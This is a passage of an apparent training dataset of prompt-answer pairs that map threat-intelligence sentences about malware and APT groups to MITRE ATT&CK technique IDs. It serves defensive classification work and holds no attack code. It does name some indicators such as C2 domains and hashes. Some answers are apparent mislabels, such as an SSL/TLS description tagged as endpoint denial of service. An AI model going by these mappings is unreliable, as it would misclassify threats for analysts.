(CVE-2020-0796) , a , the privilege escalation exploit published on the Google Security Github account, and the privilege escalation exploit.### Assistant: T1068: Exploitation for Privilege Escalation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chaes used the CreateFileW API function with read permissions to access downloaded payloads.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MoonWind has a keylogger.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hydraq creates a backdoor through which remote attackers can load and call DLL functions.### Assistant: T1129: Shared Modules" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN5 has used legitimate VPN, RDP, Citrix, or VNC credentials to maintain access to a victim environment.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In addition to looking for NTDS files on active Domain Controllers, attackers may search for backups that contain the same or similar information.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lokibot is delivered via a malicious XLS attachment contained within a spearhpishing email.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Windows implements file and directory ACLs as Discretionary Access Control Lists .### Assistant: T1222: File and Directory Permissions Modification" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Flame can take regular screenshots when certain applications are open that are sent to the command and control server.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gamaredon Group has also delivered Microsoft Outlook VBA projects with embedded macros.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ComRAT has used PowerShell to load itself every time a user logs in to the system.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gorgon Group has used macros in Spearphishing Attachments as well as executed VBScripts on victim machines.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32 has lured targets to download a Cobalt Strike beacon by including a malicious link within spearphishing emails.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GoldenSpy has established persistence by running in the background as an autostart service.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If it does, then malware can execute sudo commands without needing to supply the user's password.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,xCaon has uploaded files from victims' machines.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In the case of Astaroth trojan, the .lnk file contains an argument into WMIC.exe to run in non-interactive mode, which forgoes opening a window that the victim could notice, to download the hardcoded url in the .lnk### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InvisiMole can enumerate windows and child windows on a compromised host.### Assistant: T1010: Application Window Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A Destover-like implant used by Lazarus Group can obtain the current system time and send it to the C2 server.### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Active scans are those where the adversary probes victim infrastructure via network traffic, as opposed to other forms of reconnaissance that do not involve direct interaction.### Assistant: T1595: Active Scanning" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,YAHOYAH checks for antimalware solution processes on the system.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,REvil can force a reboot in safe mode with networking.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BADFLICK has uploaded files from victims' machines.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,EnvyScout has been distributed via spearphishing as an email attachment.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HiddenWasp uses an RC4-like algorithm with an already computed PRGA generated key-stream for network communication.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group.### Assistant: T1069: Permission Groups Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NETWIRE has the ability to write collected data to a file created in the ./LOGS directory.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Webshell can list PHP server configuration details.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This method is dependent upon the Network Boundary Bridging method in order to allow the adversaries to cross the protected network boundary of the Internet perimeter and into the organization’s WAN.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,References to various COM objects are stored in the Registry.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HTML documents can store large binary objects known as JavaScript Blobs that can later be constructed into file-like objects.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sandworm Team has used stolen credentials to access administrative accounts within the domain.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The SSL/TLS protocol suite includes mechanisms for the client and server to agree on an encryption algorithm to use for subsequent secure connections.### Assistant: T1499: Endpoint Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The group was observed installing Python 2.7 on a victim.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,StoneDrill can check for antivirus and antimalware programs.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,StoneDrill has used the WMI command-line utility to run tasks.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pillowmint has been compressed and stored within a registry key.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework., WinExec() ### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chimera has used Windows admin shares to move laterally.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PlugX can be configured to use raw TCP or UDP for command and control.### Assistant: T1095: Non-Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Silence has used Nmap to scan the corporate network, build a network topology, and identify vulnerable hosts.### Assistant: T1018: Remote System Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Fox Kitten has searched local system resources to access sensitive documents.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LookBack side loads its communications module as a DLL into the libcurl.dll loader.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,can download and execute a second-stage payload.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ObliqueRAT has the ability to check for blocklisted computer names on infected endpoints.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A malicious password filter would receive these plain-text credentials every time a password request is made.### Assistant: T1556: Modify Authentication Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Aria-body has used TCP in C2 communications.### Assistant: T1095: Non-Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NETEAGLE will decrypt resources it downloads with HTTP requests by using RC4 with the key ""ScoutEagle.""### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BackConfig has the ability to gather the victim's computer name.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turian can use VMProtect for obfuscation.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NETEAGLE allows adversaries to execute shell commands on the infected host.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Comnie continues to load an embedded bitmap (BMP) file and decrypt data at offset 0x512### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Additional Reading This PowerShell logging blog post contains more information on improving PowerShell visibility in your environment### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,On Linux systems attackers may launch dialog boxes prompting users for credentials from malicious shell scripts or the command line Unix Shell.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WastedLocker's custom crypter, CryptOne, leveraged the VirtualAlloc API function to help execute the payload.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Several commands are supported by the Honeybee's implant via the command-line interface and there’s also a utility to execute any custom command on an infected endpoint.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turla used net use commands to connect to lateral systems within a network.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lazarus Group also uses secure file deletion to delete files from the victim.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries can also stop traffic from flowing to the appropriate destination, causing denial of service.### Assistant: T1557: Adversary-in-the-Middle" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Delphi variant of Cannon does not use legitimate web-based email services for its C2 communications, instead opting to use email accounts at an actor owned domain, ambcomission[.]com### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lazarus Group has used a VBA Macro to set its file attributes to System and Hidden and has named files with a dot prefix to hide them from the Finder application.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via Accessibility Features, Boot or Logon Initialization Scripts, Unix Shell Configuration Modification, or tainting/hijacking other instrumental binary/configuration files via Hijack Execution Flow.### Assistant: T1222: File and Directory Permissions Modification" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Valak can download additional modules and malware capable of using separate C2 channels.### Assistant: T1104: Multi-Stage Channels" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NETWIRE can downloaded payloads from C2 to the compromised host.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,On Windows, the built-in klist utility can be used to list and analyze cached Kerberos tickets.### Assistant: T1558: Steal or Forge Kerberos Tickets" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Filename vsrss.exe File Size 446976 bytes MD5 5c3456d5932544b779fe814133344fdb SHA1 7ab750afb25457a81c27a98dc6dfd51c27e61b0e Notes Delphi RAT file that beacons to ebeijingcn.live### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 has renamed the WinRAR utility to avoid detection.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Zebrocy has a command to create a scheduled task for persistence.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dragonfly deleted system, security, terminal services, remote services, and audit logs from a victim.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT3 has been known to add created accounts to local admin groups to maintain elevated access.### Assistant: T1098: Account Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use port knocking to hide open ports used for persistence or command and control.### Assistant: T1205: Traffic Signaling" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ARD leverages a blend of protocols, including VNC to send the screen and control buffers and SSH for secure file transfer.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,One implementation of DNS Calculation is to take the first three octets of an IP address in a DNS response and use those values to calculate the port for command and control traffic.### Assistant: T1568: Dynamic Resolution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RainyDay has downloaded as a XOR-encrypted payload.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hi-Zor creates a Registry Run key to establish persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Security controls can include enforcement mechanisms to ensure that only valid, signed code can be run on an operating system.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A Lazarus Group custom backdoor implant included a custom PE loader named ""Security Package"" that was added into the lsass.exe process via registry key.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TajMahal has the ability to inject DLLs for malicious plugins into running processes.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,IcedID has used HTTPS in communications with C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper.### Assistant: T1491: Defacement" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Axiom group is known to have used RDP during operations.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These commands are also executed when the loadconfig command is issued### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse odbcconf.exe to bypass application control solutions that do not account for its potential abuse.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also acquire credentials by searching web browser process memory for patterns that commonly match credentials.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TajMahal has the ability to inject the LoadLibrary call template DLL into running processes.### Assistant: T1129: Shared Modules" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.### Assistant: T1040: Network Sniffing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Like past attacks, the initial infection vector is a malicious Word document attached to a phishing email that is well-tailored to the targeted business and its day-to-day operations### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TA551 has masked malware DLLs as dat and jpg files.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This is typically used in conjunction with attacks to weaken the strength of the cipher in software .### Assistant: T1600: Weaken Encryption" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TrickBot has attempted to get users to launch malicious documents to deliver its payload.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Operating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features.### Assistant: T1490: Inhibit System Recovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,They can be used as an alternative to Cron in Linux environments.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may prepare an operational environment to infect systems that visit a website over the normal course of browsing.### Assistant: T1608: Stage Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use the information from Query Registry during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It will: Download and execute the backdoor component Replace the content of the downloader Mach-O executable with a decoy, either using a base64-encoded embedded file or by downloading it from the internet Open a decoy document (described later) Close the Terminal window that just opened The decoy document replaces the downloader Mach-O file, which means the malicious executable is only present in the ZIP file now### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In addition, web traffic between a service provider’s customer and a service provider is likely to be viewed as benign by network defenders at the customer, allowing the attacker to exfiltrate data stealthily### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In cloud environments, adversaries may create accounts that only have access to specific services, which can reduce the chance of detection.### Assistant: T1136: Create Account" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FinFisher checks its parent process for indications that it is running in a sandbox setup.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Password stealer and NTLM stealer modules in CozyCar harvest stored credentials from the victim, including credentials used as part of Windows NTLM user authentication.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Prikormka adds itself to a Registry Run key with the name guidVGA or guidVSA.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RTM has been delivered as archived Windows executable files masquerading as PDF documents.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Github readme page for UACME contains an extensive list of methods that have been discovered and implemented, but may not be a comprehensive list of bypasses.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,VNC differs from Remote Desktop Protocol as VNC is screen-sharing software rather than resource-sharing software.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Amazon Web Services Amazon Machine Images , Google Cloud Platform Images, and Azure Images as well as popular container runtimes such as Docker can be backdoored.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Okrum's payload is encrypted and embedded within its loader, or within a legitimate PNG file.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These often do not require an action by the user for the exploit to be executed.### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Operation Wocao has used Impacket's smbexec.py as well as accessing the C$ and IPC$ shares to move laterally.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BitPaymer has attempted to install itself as a service to maintain persistence.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The wave against the government entity (June 26) also involved a simple PE file attachment (SHA256: d948d5b3702e140ef5b9247d26797b6dcdfe4fdb6f367bb217bc6b5fc79df520) using the filename tafahom.exe### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TrickBot has been known to use PowerShell to download new payloads, open documents, and upload data to command and control servers.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FruitFly persists via a Launch Agent.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PLAINTEE uses cmd.exe to execute commands on the victim’s machine.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Part of the AS-REP message is signed with the user’s password.### Assistant: T1558: Steal or Forge Kerberos Tickets" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also add their malicious applications to the list of minimal services that start in safe mode by modifying relevant Registry values Modify Registry.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Low confidence generally means that the information's credibility and/or plausibility is questionable, or that the information is too fragmented or poorly corroborated to make solid analytic inferences, or that [there are] significant concerns or problems with the sources### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT3 has used a tool to dump credentials by injecting itself into lsass.exe and triggering with the argument ""dig.""### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PUNCHBUGGY can download additional files and payloads to compromised hosts.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In preparation for its attack against the 2018 Winter Olympics, Sandworm Team conducted online research of partner organizations listed on an official PyeongChang Olympics partnership site.### Assistant: T1591: Gather Victim Org Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Net Crawler uses PsExec to perform remote service manipulation to execute a copy of itself as part of lateral movement.### Assistant: T1569: System Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HAFNIUM has used the Exchange Power Shell module Set-OabVirtualDirectoryPowerShell to export mailbox data.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MoleNet can perform WMI commands on the system.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system.### Assistant: T1137: Office Application Startup" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Melcoz has the ability to download additional files to a compromised host.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Clop has used built-in API functions such as WNetOpenEnumW, WNetEnumResourceW, WNetCloseEnum, GetProcAddress, and VirtualAlloc.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Shamoon has an operational mode for encrypting data instead of overwriting it.### Assistant: T1486: Data Encrypted for Impact" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,By staging data on one system prior to Exfiltration, adversaries can minimize the number of connections made to their C2 server and better evade detection.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The victim's time zone may also be inferred from the current system time or gathered by using w32tm /tz.### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dtrack has used a decryption routine that is part of an executable physical patch.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Registration of new windows classes can include a request for up to 40 bytes of EWM to be appended to the allocated memory of each instance of that class.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Maze operators have created scheduled tasks masquerading as ""Windows Update Security"", ""Windows Update Security Patches"", and ""Google Chrome Security Update"" designed to launch the ransomware.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Operation Wocao has encrypted IP addresses used for ""Agent"" proxy hops with RC4.### Assistant: T1001: Data Obfuscation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Operating system's name (i.e., the name of the machine) Operating system's OS architecture Operating system's caption Computer system's domain Computer system's username Computer's public IP address### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cardinal RAT checks its current working directory upon execution and also contains watchdog functionality that ensures its executable is located in the correct path .### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Tropic Trooper has tested if the localhost network is available and other connection capability on an infected system using command scripts.### Assistant: T1049: System Network Connections Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Figure 6: Assembly view of Sample 3 root installation related byte arrays As it turns out, the referenced byte mask is applied to the other byte arrays using a rolling double-XOR algorithm to construct malware installation paths, filenames, and descriptions for a Linux root account### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,EvilBunny has used WMI to gather information about the system.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,POWERSTATS has used PowerShell code with custom string obfuscation Matryoshka obfuscates API function names using a substitute cipher combined with Base64 encoding.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,IcedID has used obfuscated VBA string expressions.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,That malicious dll then loads encrypted shellcode from the binary, which is decrypted and runs the final BUGJUICE payload### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RTM strings, network data, configuration, and modules are encrypted with a modified RC4 algorithm.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cardinal RAT can execute commands.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Maze has created a file named ""startup_vrun.bat"" in the Startup folder of a virtual machine to establish persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Different protocol channels could also include Web services such as cloud storage.### Assistant: T1048: Exfiltration Over Alternative Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Anchor can establish persistence by creating a service.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FatDuke can AES encrypt C2 communications.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Astaroth loads its module with the XSL script parameter vShow set to zero, which opens the application with a hidden window.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Caching alternate authentication material allows the system to verify an identity has successfully authenticated without asking the user to reenter authentication factor.### Assistant: T1550: Use Alternate Authentication Material" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Umbreon creates valid local users to provide access to the system.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sandworm Team has used Base64 encoding within malware variants.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Revenge RAT has a plugin for microphone interception.### Assistant: T1123: Audio Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse control.exe to proxy execution of malicious payloads.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 used 7-Zip to compress stolen emails into password-protected archives prior to exfiltration.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RunningRAT contains code to open and copy data from the clipboard.### Assistant: T1115: Clipboard Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Apple’s securityd utility takes the user’s logon password, encrypts it with PBKDF2, and stores this master key in memory.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Any potential changes cannot take effect until every registered filter acknowledges validation.### Assistant: T1556: Modify Authentication Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT39 has used the Smartftp Password Decryptor tool to decrypt FTP passwords.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A FinFisher variant uses a custom packer.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GrimAgent has used Accept-Language to identify hosts in the United Kingdom, United States, France, and Spain.### Assistant: T1614: System Location Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,When using msxsl.exe adversaries may also give the XML/XSL files an arbitrary file extension.### Assistant: T1220: XSL Script Processing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turla has used shellcode to download Meterpreter after compromising a victim.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Group used msxsl.exe to bypass AppLocker and to invoke Jscript code from an XSL file.### Assistant: T1220: XSL Script Processing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The keylogger then records keystrokes in encrypted files, for example: thumbcache_96.dbx### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The quarantine flag is an opt-in system and not imposed by macOS.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,jRAT can list network connections.### Assistant: T1049: System Network Connections Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Fysbis has masqueraded as trusted software rsyncd and dbus-inotifier.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike can inject a variety of payloads into processes dynamically chosen by the adversary.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Asymmetric cryptography, also known as public key cryptography, uses a keypair per party: one public that can be freely distributed, and one private.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rising Sun can detect the username of the infected host.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Emotet has sent Microsoft Word documents with embedded macros that will invoke scripts to download additional payloads.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,POWRUNER may collect domain group information by running net group /domain or a series of other commands on a victim.### Assistant: T1069: Permission Groups Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bad Rabbit has been executed through user installation of an executable disguised as a flash installer.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lokibot has utilized multiple techniques to bypass UAC.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MarkiRAT can use the GetKeyboardLayout API to check if a compromised host's keyboard is set to Persian.### Assistant: T1614: System Location Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ADVSTORESHELL exfiltrates data over the same channel used for C2.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chimera has collected documents from the victim's SharePoint.### Assistant: T1213: Data from Information Repositories" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HOPLIGHT has the ability to connect to a remote host in order to upload and download files.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cuba has been disguised as legitimate 360 Total Security Antivirus and OpenVPN programs.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE 